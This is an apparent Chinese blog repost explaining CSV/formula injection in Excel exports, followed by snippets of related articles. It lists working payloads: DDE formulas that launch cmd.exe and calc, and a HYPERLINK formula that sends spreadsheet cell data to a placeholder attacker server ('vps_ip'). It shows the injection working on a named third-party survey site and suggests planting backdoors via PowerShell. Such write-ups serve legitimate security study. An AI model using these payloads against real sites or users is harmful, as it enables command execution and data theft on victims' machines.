csv注入漏洞原理&&实战

最新推荐文章于 2024-05-23 10:50:55 发布
最新推荐文章于 2024-05-23 10:50:55 发布
阅读量1.8k 收藏 1
点赞数
文章标签: java 操作系统
原文链接:http://www.cnblogs.com/hac425/p/9416941.html
版权

前言

 为了找工作,巩固巩固知识。本文会介绍 csv 注入漏洞的原理,最后给出一个示例。 

正文

csv 文件 和 xlsx 文件中的每一项的值如果是 =, @, +, - 就会被 excel 识别为一个 公式, 此时可以注入 系统命令 实现 命令执行。

常用 payload :

=cmd|'/c calc'!A0    # 弹计算器
=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c calc.exe'!''  # 弹计算器

=HYPERLINK("http://vps_ip?test="&A2&A3,"Error: Please click me!")  # 发起 http请求 获取数据

示例

目标网址

http://www.starrysurvey.com/

首先自己创建一个在线报表,然后 让用户 填入  payload

006daSSqgy1fyhyfnuluuj30lm0fvdg5.jpg

006daSSqgy1fyhyfw3c9oj31750lxgmv.jpg

打开导出的 xlsx 文件, 可以看到没被过滤,成功注入了表达式。 双击它在点出去(貌似这样才能使 excel 识别这个为 一个公式, excel 2007, 2010 测试) 即可打开 计算器

006daSSqgy1fyhyg234n1j30si067dfu.jpg

真正用于渗透测试的话,可以借助 powershell 等手段 植入后门。

参考

http://www.freebuf.com/articles/system/160797.html
https://www.contextis.com/blog/comma-separated-vulnerabilities
http://blog.knownsec.com/2016/05/csv-injection-vulnerability/

转载于:https://www.cnblogs.com/hac425/p/9416941.html

weixin_30836759
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞挖掘】——46、 CSV注入实践操作
Fly_鹏程万里
06-07 37
CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量,攻击这可以向Excel文件中注入可以输出或以CSV文件读取的恶意攻击载荷,当用户打开Excel文件时,文件会从CSV描述转变为原始的Excel格式,包括Excel提供的所有动态功能,在这个过程中,CSV中的所有Excel公式都会执行,当该函数有合法意图时,很易被滥用并允许恶意代码执行。
Webug(csv注入
weixin_40646615的博客
02-23 597
文章目录Webbug(csv注入CSV注入原理源代码漏洞利用总结 Webbug(csv注入CSV是(逗号分隔值)的英文缩写,通常都是纯文本文件。EXCEL表就可以存为CSV格式,可以用写字板之类工具打开。 CSV注入原理 创建一个CSV格式文件,使用Excel打开,当你输入一个公式,会被Excel自动运算并执行: eg:输入 =3+1,显示自动运算结果 而当你输入一个Excel本身不会存在的功能时,Excel就会被微软的另一种机制:DDE机制调用。 eg:输入 =cmd|’ /C calc’!.
安全测试-CSV注入漏洞
热门推荐
iSelenium
11-01 1万+
  CSV Injection Vulnerability 2016-05-17 Author: Evi1m0 (知道创宇404安全实验室) Date: 2016-05-17 0x01 概述 现在很多应用提供了导出电子表格的功能(不限于 Web 应用),早在 2014 年 8月 29 日国外 James Kettle 便发表了《Comma Separated Vulnerabiliti...
CSV注入
94小菜
11-25 4446
CSV注入 漏洞简介: CSV注入(CSV Injection)漏洞通常会出现在有导出文件(.csv/.xls)功能的网站中。当导出的文件内容可控时,攻击者通常将恶意负载(公式)注入到输入字段中,用户导出文件打开后,EXCEL会调用本身的动态功能,执行攻击者的恶意代码,从而控制用户计算机。 漏洞原理: 在xls表格中,输入=1+1,回车后看到表格变成2,+号被当作运算执行了 不只是+号, = 、- 、@这三个符号也会被excel解析成共事 DDE(Dynamic Data Exchange)协议: DDE
CSV Injection (CSV 注入攻击)
cwxbox
01-28 1151
CSV注入,也称为公式注入,发生在网站在CSV文件中嵌入不可信输入时。当使用电子表格程序(如Microsoft Excel或LibreOffice Calc)打开CSV时,所有以=开头的单元格都会被软件解释为一个公式。
实战csv文件的生成与读取
12-21
实战项目涉及CSV文件的生成和读取,特别是针对加利福尼亚房价预测数据集。 首先,我们了解CSV文件的生成过程: 1. 定义输出目录`output_dir`来存储生成的CSV文件。如果该目录不存在,使用`os.mkdir()`创建。 2. ...
H2 数据库导入CSV文件实现原理简析
12-15
1.启动H2数据库不打开浏览器窗口(默认是打开的) 2.数据库创建SQL增加了支持BigDecimal类型,h2数据库默认是不支持bigdecimal类型的: Sql代码 代码如下: create table test(id int(11),charge BigDecimal(12)) Sql...
最完整的table转csv&excel;&pdf; jquery插件
10-19
最完整的table转csv&excel;&pdf; jquery插件。最完整的table转csv&excel;&pdf; jquery插件。最完整的table转csv&excel;&pdf; jquery插件。
情绪识别实战数据集ISEAR.csv
07-19
情绪识别数据集汇总,里面是本人亲自汇总的情绪识别的训练数据集,其中第一个是label标签,表示的是情绪,第二个是数据,是句子。
BurpSuite_payloads:与Burp Suite入侵者一起使用的有效载荷。 (最初在swisskeyrepo-PayloadsAllTheThings上找到)
04-15
BurpSuite_payloads 与Burp Suite入侵者一起使用的有效载荷(最初在swisskeyrepo-PayloadsAllTheThings上找到) 要在命令行中解压缩文件,请执行以下操作: tar xjf PayloadsAllTheThings.tar.bz2 -or- tar -xvjf PayloadsAllTheThings.tar.bz2 包括在有效载荷中: API密钥泄漏AWS Amazon Bucket S3 CORS配置错误CRLF注射CSRF注射CSV注入命令注入目录遍历文件包含GraphQL注射不安全的反序列化不安全的直接对象引用管理界面不安全不安全的源代码管理JSON Web令牌Kubernetes LDAP注入乳胶注射方法与资源NoSQL注入OAuth 打开重定向比赛条件SAML注入SQL注入服务器端请求伪造服务器端模板注入类型杂耍上载不
wordpress import csv 复现 admin+ XSS注入 2023.8.5
最新发布
chaopi_的博客
05-23 187
虽然这个漏洞只能是管理员插入,但是也同时提供了一个思路,就是这种导入的方式可以绕过wordpress的字符转义从而实现xss注入。对传入的数据没有进行完全过滤,只判断是否为空或者是否存在权限和文件类型判断。这个方式可以绕过wordpress本身的过滤。在csv文件内写入payload。导入存在payload的文件。
csv注入java怎么解决_csv注入复现代码
weixin_29443201的博客
02-27 483
以下代码生成的csv文件,使用Microsoft Execl能成功弹出计算器,虽然打开时有安全提示,但是大多数src还是会接收该类漏洞--------------------------------------------------------------------------------------------package jinqi;public class User {private ...
Web 安全之 CSV 注入攻击详解
路多辛的所思所想
02-25 1405
CSV 是一种简单的文件格式,用于存储表格数据,每行一个数据记录,每个记录由逗号分隔的多个字段组成。CSV 文件因其简单性和跨平台性而被广泛使用,在数据导出和导入中尤其常见。CSV 注入攻击是攻击者通过某些方式在 CSV 文件中注入恶意的代码,并利用电子表格软件处理 CSV 文件时的特性来执行恶意代码实现非法操作的攻击方式。这种攻击通常发生在应用程序在处理 CSV 文件时,没有正确地校验或转义用户输入的特殊字符,从而被攻击者利用在 CSV 文件中注入恶意代码。
csv注入复现代码
weixin_30909575的博客
06-24 383
以下代码生成的csv文件,使用Microsoft Execl能成功弹出计算器,虽然打开时有安全提示,但是大多数src还是会接收该类漏洞 -------------------------------------------------------------------------------------------- package jinqi;public class U...
csv注入java怎么解决_CSV 注入实战
weixin_34910679的博客
02-27 1083
oxo1 前言之前看到过 CSV 注入的文章,具体想了解的请搜索学习,这里不多作介绍。今天刚好碰到了导出功能,就随手测试一波,没想到还真的存在 CSV 注入漏洞。oxo2 经过1、测试漏洞看到有导出功能,就新建一个用户,随手插入 Payload导出 CSV 文件查看 CSV 文件,发现结果等于 2 ,说明存在漏洞。2、利用漏洞这里反弹 shell就在本地演示好了. 利用 powershell 来进...
创建Excel,解析Excel,处理CSV Injection
u012874209的博客
04-02 870
1.使用Apache POI创建和解析Excel Maven依赖 <!-- https://mvnrepository.com/artifact/org.apache.poi/poi --> <dependency> <groupId>org.apache.poi</groupId> <artifactId>po...
如何排查是否存在CSV漏洞
08-24
然而,由于CSV文件的特殊构造,会导致一些安全问题,比如CSV注入漏洞。下面是排查CSV漏洞的一些方法: 1. 验证数据源:检查CSV文件的来源和可信度。确保数据源是可靠的,避免下载并使用不明来源的CSV文件。 2. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值